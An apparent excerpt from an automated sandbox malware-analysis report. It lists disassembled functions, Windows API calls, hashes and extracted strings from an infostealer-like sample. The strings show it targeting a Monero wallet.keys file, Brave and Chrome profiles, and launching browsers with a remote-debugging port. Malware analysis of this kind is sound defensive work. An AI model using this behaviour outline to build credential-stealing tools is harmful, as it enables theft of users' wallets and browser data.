                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$AllocCurrentExitNumaVirtual
                                  • String ID:
                                  • API String ID: 1103761159-0
                                  • Opcode ID: 56549b192f3f305fdf740bcfe534053a0cbf7ab8533e9e07c32f4f81edd24fae
                                  • Instruction ID: b34663c76fa6c8182ffb8c0f15587a1cbd7b498d567c6d3ff22bdadd6aa57a6a
                                  • Opcode Fuzzy Hash: 56549b192f3f305fdf740bcfe534053a0cbf7ab8533e9e07c32f4f81edd24fae
                                  • Instruction Fuzzy Hash: C0E086B094E308FFE750DBA19C0EB0C7668DB04B01F100094F70C761D0C6B425848658
                                  Function 00BA10A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00BA10B3
                                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00BA10F7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Virtual$AllocFree
                                  • String ID:
                                  • API String ID: 2087232378-0
                                  • Opcode ID: d44953b3a03f123baff9e7e8220e69b0b1ba2dbe349c811510cb2fbe49e70c4d
                                  • Instruction ID: 4d89d4c0c97a24a6cc7c00652c0c8987367e78a671ac1407f7b3669113950287
                                  • Opcode Fuzzy Hash: d44953b3a03f123baff9e7e8220e69b0b1ba2dbe349c811510cb2fbe49e70c4d
                                  • Instruction Fuzzy Hash: BCF0E9B1641204BBE7249AB89C59FAEB7DCE705704F300844F544E7280D5719E04C7A0
                                  Function 00BA1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BB7A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BB7AA0
                                    • Part of subcall function 00BB7A70: RtlAllocateHeap.NTDLL(00000000), ref: 00BB7AA7
                                    • Part of subcall function 00BB7A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00BB7ABF
                                    • Part of subcall function 00BB79E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00BA11B7), ref: 00BB7A10
                                    • Part of subcall function 00BB79E0: RtlAllocateHeap.NTDLL(00000000), ref: 00BB7A17
                                    • Part of subcall function 00BB79E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00BB7A2F
                                  • ExitProcess.KERNEL32 ref: 00BA11C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$Process$AllocateName$ComputerExitUser
                                  • String ID:
                                  • API String ID: 3550813701-0
                                  • Opcode ID: dedae4b988104fd38eb6da971b919a9cd37c6e08f07a2db39e9122352222e17f
                                  • Instruction ID: ea00d28f94d85e3a36d9e4a3fb68e4689e8750eae6779d84a202b3df3b4d0495
                                  • Opcode Fuzzy Hash: dedae4b988104fd38eb6da971b919a9cd37c6e08f07a2db39e9122352222e17f
                                  • Instruction Fuzzy Hash: 39E012A594830157DE60B7B67C07B7B32CC9B5534EF000894F908B2102EEA5E8458665

                                  Non-executed Functions

                                  Function 00BABE40 Relevance: 58.5, APIs: 26, Strings: 7, Instructions: 730fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                    • Part of subcall function 00BBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BBAC82
                                    • Part of subcall function 00BBAC30: lstrcat.KERNEL32(00000000), ref: 00BBAC92
                                    • Part of subcall function 00BBACC0: lstrlen.KERNEL32(?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BBACD5
                                    • Part of subcall function 00BBACC0: lstrcpy.KERNEL32(00000000), ref: 00BBAD14
                                    • Part of subcall function 00BBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAD22
                                    • Part of subcall function 00BBABB0: lstrcpy.KERNEL32(?,00BC0E1A), ref: 00BBAC15
                                  • FindFirstFileA.KERNEL32(00000000,?,00BC0B32,00BC0B2F,00000000,?,?,?,00BC1450,00BC0B2E), ref: 00BABEC5
                                  • StrCmpCA.SHLWAPI(?,00BC1454), ref: 00BABF33
                                  • StrCmpCA.SHLWAPI(?,00BC1458), ref: 00BABF49
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00BAC8A9
                                  • FindClose.KERNEL32(000000FF), ref: 00BAC8BB
                                  Strings
                                  • --remote-debugging-port=9229 --profile-directory=", xrefs: 00BAC495
                                  • Brave, xrefs: 00BAC0E8
                                  • --remote-debugging-port=9229 --profile-directory=", xrefs: 00BAC3B2
                                  • Google Chrome, xrefs: 00BAC6F8
                                  • \Brave\Preferences, xrefs: 00BAC1C1
                                  • --remote-debugging-port=9229 --profile-directory=", xrefs: 00BAC534
                                  • Preferences, xrefs: 00BAC104
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                  • API String ID: 3334442632-1869280968
                                  • Opcode ID: d37bb654ea698a604e2efb7e2d09f8b1e47f0fbd97768868838215b40ef0c559
                                  • Instruction ID: 3b22671935f5e2532155fed4aa083dca9cc46cef0f00f2186c28c0db651ad373
                                  • Opcode Fuzzy Hash: d37bb654ea698a604e2efb7e2d09f8b1e47f0fbd97768868838215b40ef0c559
                                  • Instruction Fuzzy Hash: C0521072910108ABCF24FB60DD96EFE77BDAF55300F4045E8B51A66191EE709B48CFA2
                                  Function 00BB3B00 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 00BB3B1C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00BB3B33
                                  • lstrcat.KERNEL32(?,?), ref: 00BB3B85
                                  • StrCmpCA.SHLWAPI(?,00BC0F58), ref: 00BB3B97
                                  • StrCmpCA.SHLWAPI(?,00BC0F5C), ref: 00BB3BAD
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00BB3EB7
                                  • FindClose.KERNEL32(000000FF), ref: 00BB3ECC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                  • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                  • API String ID: 1125553467-2524465048
                                  • Opcode ID: 8335d576999c724415a54f0ca8648a1b9fa8feef52c7a0706b35c5d76a756700
                                  • Instruction ID: 0952194332dddee97c71c19df59e419ed203e449551350250f0c4a84cf7b2f28
                                  • Opcode Fuzzy Hash: 8335d576999c724415a54f0ca8648a1b9fa8feef52c7a0706b35c5d76a756700
                                  • Instruction Fuzzy Hash: C9A12EB1A002089FDB34DFA4DC85FFA73B8AB48700F4445D9B64DA6191EB709B88CF61
                                  Function 00BB4B60 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 00BB4B7C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00BB4B93
                                  • StrCmpCA.SHLWAPI(?,00BC0FC4), ref: 00BB4BC1
                                  • StrCmpCA.SHLWAPI(?,00BC0FC8), ref: 00BB4BD7
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00BB4DCD
                                  • FindClose.KERNEL32(000000FF), ref: 00BB4DE2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s$%s\%s$%s\*
                                  • API String ID: 180737720-445461498
                                  • Opcode ID: 15a6e6c58b6d15193af54663b81b52cedb99a060f3b6c9f2eae519813808896d
                                  • Instruction ID: 194bbca42f65eeefff9b78f8aad9f78783ccc6d15ac3bff8e7827e022832885a
                                  • Opcode Fuzzy Hash: 15a6e6c58b6d15193af54663b81b52cedb99a060f3b6c9f2eae519813808896d
                                  • Instruction Fuzzy Hash: CD6133B1904218AFCB20EBA4DC45FEA73BCBB48700F0045DCB65DA6151EB70AB88CF91
                                  Function 00BB47C0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00BB47D0
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00BB47D7
                                  • wsprintfA.USER32 ref: 00BB47F6
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00BB480D
                                  • StrCmpCA.SHLWAPI(?,00BC0FAC), ref: 00BB483B
                                  • StrCmpCA.SHLWAPI(?,00BC0FB0), ref: 00BB4851
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00BB48DB
                                  • FindClose.KERNEL32(000000FF), ref: 00BB48F0
                                  • lstrcat.KERNEL32(?,0130EDA8), ref: 00BB4915
                                  • lstrcat.KERNEL32(?,0130DFD8), ref: 00BB4928
                                  • lstrlen.KERNEL32(?), ref: 00BB4935
                                  • lstrlen.KERNEL32(?), ref: 00BB4946
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                  • String ID: %s\%s$%s\*
                                  • API String ID: 671575355-2848263008
                                  • Opcode ID: d834798ad79d18f85159c9336bce565f343569d7ddf58bfe8948fa02bbef2d4f
                                  • Instruction ID: 4cdde8c38113312b5e9aa27b261eb1706a75d3310931bea498c21b19aa2c1ba2
                                  • Opcode Fuzzy Hash: d834798ad79d18f85159c9336bce565f343569d7ddf58bfe8948fa02bbef2d4f
                                  • Instruction Fuzzy Hash: CC5122B1904218AFCB24EB70DC89FEE77BCAB58700F4045D8B65DA6151EB709AC8CF91
                                  Function 00BB40F0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 00BB4113
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00BB412A
                                  • StrCmpCA.SHLWAPI(?,00BC0F94), ref: 00BB4158
                                  • StrCmpCA.SHLWAPI(?,00BC0F98), ref: 00BB416E
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00BB42BC
                                  • FindClose.KERNEL32(000000FF), ref: 00BB42D1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 180737720-4073750446
                                  • Opcode ID: 9be50566626eaa9a441ddfd6e1df0b596ad02c42dca0958f80d233d59d3a622c
                                  • Instruction ID: 4030d115c0f961acc126d579d1f27b8455dc649e88aea779cdad039a21522bc4
                                  • Opcode Fuzzy Hash: 9be50566626eaa9a441ddfd6e1df0b596ad02c42dca0958f80d233d59d3a622c
                                  • Instruction Fuzzy Hash: D55144B1904218AFCB24EBB4DC85EEA77BCBB58300F4045DCB659A6051DB719BC9CF90
                                  Function 00BAEE20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 00BAEE3E
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00BAEE55
                                  • StrCmpCA.SHLWAPI(?,00BC1630), ref: 00BAEEAB
                                  • StrCmpCA.SHLWAPI(?,00BC1634), ref: 00BAEEC1
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00BAF3AE
                                  • FindClose.KERNEL32(000000FF), ref: 00BAF3C3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\*.*
                                  • API String ID: 180737720-1013718255
                                  • Opcode ID: ca16ea7eeae1712659cc0de4d62803754a75e765463a4e238d0f691ec250fbbb
                                  • Instruction ID: 48e5559bedba4dbffaea7e049c23b49ff60fce8a9778eb85b76da7fd7138cf92
                                  • Opcode Fuzzy Hash: ca16ea7eeae1712659cc0de4d62803754a75e765463a4e238d0f691ec250fbbb
                                  • Instruction Fuzzy Hash: E7E1E272D11118ABDF64FB60CDA2EFE77B9AF54300F4045E9B41A62092EE706B89CF51
                                  Function 00BE0098 Relevance: 17.4, Strings: 13, Instructions: 1151COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
